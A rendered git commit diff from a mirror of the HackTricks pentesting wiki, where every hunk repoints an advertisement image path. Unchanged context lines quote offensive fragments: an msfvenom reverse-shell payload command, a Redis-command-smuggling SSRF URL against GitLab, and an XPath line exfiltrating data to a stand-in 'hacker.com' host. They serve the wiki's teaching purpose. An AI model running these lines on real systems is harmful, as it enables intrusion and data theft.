Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-21 20:23:18 +00:00
Code Issues Projects Releases Packages Wiki Activity

hp

Browse source
This commit is contained in:
Carlos Polop 2024-11-19 12:36:42 +01:00
parent 5089693f1d
commit 233c08b779
19 changed files with 44 additions and 44 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
README.md
View file

@ -65,7 +65,7 @@ Get Access Today:
### [HACKENPROOF](https://bit.ly/3xrrDrL) ### [HACKENPROOF](https://bit.ly/3xrrDrL)
<figure><img src=".gitbook/assets/image.png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

6
generic-methodologies-and-resources/pentesting-wifi/README.md
View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -310,7 +310,7 @@ So broken and unused nowdays. Just know that _**airgeddon**_ have a WEP option c
*** ***
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -831,7 +831,7 @@ These methods, particularly PIN entry, are susceptible to the same vulnerabiliti
TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals) TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals)
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

4
generic-methodologies-and-resources/reverse-shells/msfvenom.md
View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -235,7 +235,7 @@ msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f
``` ```
{% endcode %} {% endcode %}
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

4
linux-hardening/linux-privilege-escalation-checklist.md
View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -168,7 +168,7 @@ Stay informed with the newest bug bounties launching and crucial platform update
* [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)? * [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)?
* [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)? * [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

4
macos-hardening/macos-security-and-privilege-escalation/README.md
View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" d
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -145,7 +145,7 @@ Of course from a red teams perspective you should be also interested in escalati
* [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ) * [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ)
* [**https://www.youtube.com/watch?v=vMGiplQtjTY**](https://www.youtube.com/watch?v=vMGiplQtjTY) * [**https://www.youtube.com/watch?v=vMGiplQtjTY**](https://www.youtube.com/watch?v=vMGiplQtjTY)
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

8
mobile-pentesting/android-app-pentesting/README.md
View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -245,7 +245,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains
*** ***
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -584,7 +584,7 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b
*** ***
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -841,7 +841,7 @@ AndroL4b is an Android security virtual machine based on ubuntu-mate includes th
* [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/) * [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/)
* [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit) * [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit)
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

4
network-services-pentesting/135-pentesting-msrpc.md
View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -123,7 +123,7 @@ The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/97805
* [https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/](https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/) * [https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/](https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/)
* [https://0xffsec.com/handbook/services/msrpc/](https://0xffsec.com/handbook/services/msrpc/) * [https://0xffsec.com/handbook/services/msrpc/](https://0xffsec.com/handbook/services/msrpc/)
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

4
network-services-pentesting/27017-27018-mongodb.md
View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -132,7 +132,7 @@ If you are root you can **modify** the **mongodb.conf** file so no credentials a
*** ***
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

6
network-services-pentesting/5985-5986-pentesting-winrm.md
View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -174,7 +174,7 @@ winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}' winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
``` ```
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -344,7 +344,7 @@ Entry_2:
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

4
network-services-pentesting/6000-pentesting-x11.md
View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -189,7 +189,7 @@ Then, put your IP address and port in the **R-Shell** option and click on **R-sh
* `port:6000 x11` * `port:6000 x11`
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

6
network-services-pentesting/6379-pentesting-redis.md
View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -161,7 +161,7 @@ DUMP <key>
**Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/) **Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/)
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -347,7 +347,7 @@ git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agit
_For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was took from) the exploitation worked with the `git` scheme and not with the `http` scheme._ _For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was took from) the exploitation worked with the `git` scheme and not with the `http` scheme._
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

4
network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -192,7 +192,7 @@ msf exploit(tomcat_mgr_deploy) > show options
* [https://github.com/yaoweibin/nginx\_ajp\_module](https://github.com/yaoweibin/nginx\_ajp\_module) * [https://github.com/yaoweibin/nginx\_ajp\_module](https://github.com/yaoweibin/nginx\_ajp\_module)
* [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295) * [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295)
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

4
network-services-pentesting/pentesting-ntp.md
View file

@ -16,7 +16,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
{% endhint %} {% endhint %}
{% endhint %} {% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -110,7 +110,7 @@ Entry_2:
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

6
pentesting-web/content-security-policy-csp-bypass/README.md
View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -694,7 +694,7 @@ Both methods exploit the nuances of CSP implementation and behavior in browsers,
Trick from [**here**](https://ctftime.org/writeup/29310). Trick from [**here**](https://ctftime.org/writeup/29310).
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -844,7 +844,7 @@ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

4
pentesting-web/csrf-cross-site-request-forgery.md
View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -624,7 +624,7 @@ with open(PASS_LIST, "r") as f:
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

6
pentesting-web/file-inclusion/README.md
View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" d
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -492,7 +492,7 @@ Similarly, for executing arbitrary system commands, one might use:
It's important to **URL-encode these payloads**. It's important to **URL-encode these payloads**.
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -742,7 +742,7 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
{% file src="../../.gitbook/assets/EN-Local-File-Inclusion-1.pdf" %} {% file src="../../.gitbook/assets/EN-Local-File-Inclusion-1.pdf" %}
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

4
pentesting-web/reset-password.md
View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -214,7 +214,7 @@ POST /api/changepass
* [https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token](https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token) * [https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token](https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token)
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

4
pentesting-web/xpath-injection.md
View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -318,7 +318,7 @@ doc-available(concat("http://hacker.com/oob/", RESULTS))
* [https://wiki.owasp.org/index.php/Testing\_for\_XPath\_Injection\_(OTG-INPVAL-010)](https://wiki.owasp.org/index.php/Testing\_for\_XPath\_Injection\_\(OTG-INPVAL-010\)) * [https://wiki.owasp.org/index.php/Testing\_for\_XPath\_Injection\_(OTG-INPVAL-010)](https://wiki.owasp.org/index.php/Testing\_for\_XPath\_Injection\_\(OTG-INPVAL-010\))
* [https://www.w3schools.com/xml/xpath\_syntax.asp](https://www.w3schools.com/xml/xpath\_syntax.asp) * [https://www.w3schools.com/xml/xpath\_syntax.asp](https://www.w3schools.com/xml/xpath\_syntax.asp)
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

4
windows-hardening/active-directory-methodology/asreproast.md
View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
@ -121,7 +121,7 @@ ASRepCatcher listen
*** ***
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!